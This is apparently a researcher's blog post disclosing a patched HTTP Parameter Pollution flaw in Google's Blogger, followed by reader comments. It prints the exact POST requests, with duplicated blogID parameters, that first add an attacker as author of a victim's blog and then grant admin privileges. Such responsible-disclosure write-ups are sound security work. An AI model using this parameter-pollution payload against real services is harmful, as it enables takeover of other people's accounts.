Hi,
This is my first post in my blog and also my first post regarding my security vulnerabilities findings in Google Reward Program,
In the last 2 months, I participated in Google reward program and found some High, Serious vulnerabilities,
(First, I want to mention that Google has the best professional, brilliant security team, It amazing how much Google care about security and do a amazing job to secure their sites, Thanks Adam, Google Security Team for giving me the chance to show my skills :))
The vulnerability that I want to share first, Is a critical vulnerability in Blogger (Google Service),
That vulnerability could be used by an attacker to get administrator privilege over any blogger account (Permission Issue),
Yes I know it sound kind of crazy but it's true :),
Here are the details regarding the issue in Blogger service,
I found a HTTP Parameter Pollution vulnerability in Blogger that allow an attacker to add himself as an administrator on the victim's blogger account,
Technical details:
Here are the steps for getting admin control permissions over any blogger accounts.
1.
The attacker Use the invite author options in blogger (add authors):
Vulnerability location:
POST /add-authors.do HTTP/1.1
Request:
security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=goldshlager19test%40gmail.com(attacker email)&ok=Invite
As you can see I added two blogid value in my post request (blogID=attackerblogidvalue&blogID=victimblogidvalue)
The server checks the first blogid value and executes the second blogid value of the attacker
2.
After that the attacker receives a mail to confirm him as a author (author invitation link),
After that, the attacker will be added as an author on the victim account.
3.
At this step it becomes possible to modify the attacker permission from an author to an administrator,
Vulnerability Location:
POST /team-member-modify.do HTTP/1.1
Request:
security_token=attackertoken&blogID=attackerownblogid&blogID=victimblogidvalue&memberID=attackermemberid&isAdmin=true&ok=Grant+admin+privileges
And?
PoC Video:
2.(Full Video Download): http://www.2shared.com/file/90mjfuab/Blogger_Get_Administrator_priv.html (The vulnerability mentioned here has been confirmed patched by the Google Security Team very fast.) Best Regards Nir.Goldshlager
16 comments:
Is this patched? I tried it but can't get anything but a 404 when i tamper the authors-add request
Very impressive
keep up the good work !
Thanks for reporting this issue to us privately. Blogger quickly fixed the problem a few months ago.
Good work & gl with your new blog.
Anatoli
great job again from Avnet pen team
(The vulnerability mentioned here has been confirmed patched (very fast) by the Google Security Team a few months ago.)
Truely one of the first live HPP proof of concept.
Way to go!
Nice!
Good idea, Nil.
good work, useful example how an attcker can exploit other application affected by this vulnerability
Nice work...HPP is realy great technique.
But you still didn't managed to bypassed Comitari Web Protection Suite ;-)
Keep posting these interesting foundings...
I'm a newbie and trying to do as you did but not successfully :(
How can I make you part of my team?
Security is the name of my purpose in contacting you: Specially Social Networked profiles to keep forward on a project. I am an art entity (I call myself like that, to avoid political noise when defining "Artist" or worse: "female artist")some pages about in FaceBook Art in Hers, Galeria de Originales, Poesia -- twitter accounts are @imprimattura, @artistcoatl, @textualart other accounts include a number of blogs, parked websites, and unpublished materials: Kind of paralyzed because of security (I've already been attacked and want to protect futures). I wish you get interested in this: I want to innovate, make a cloud installation, publish a different kind of poetry book. Best wishes are to take pirates out and start making a profit.
Epic work man!! I'm glad we're on the same team ;-)
ya really awsm!! Hat off you!!!
Good information here. I will post these information to my facebook page. It is really very informative for others bangladeshrooms
Post a Comment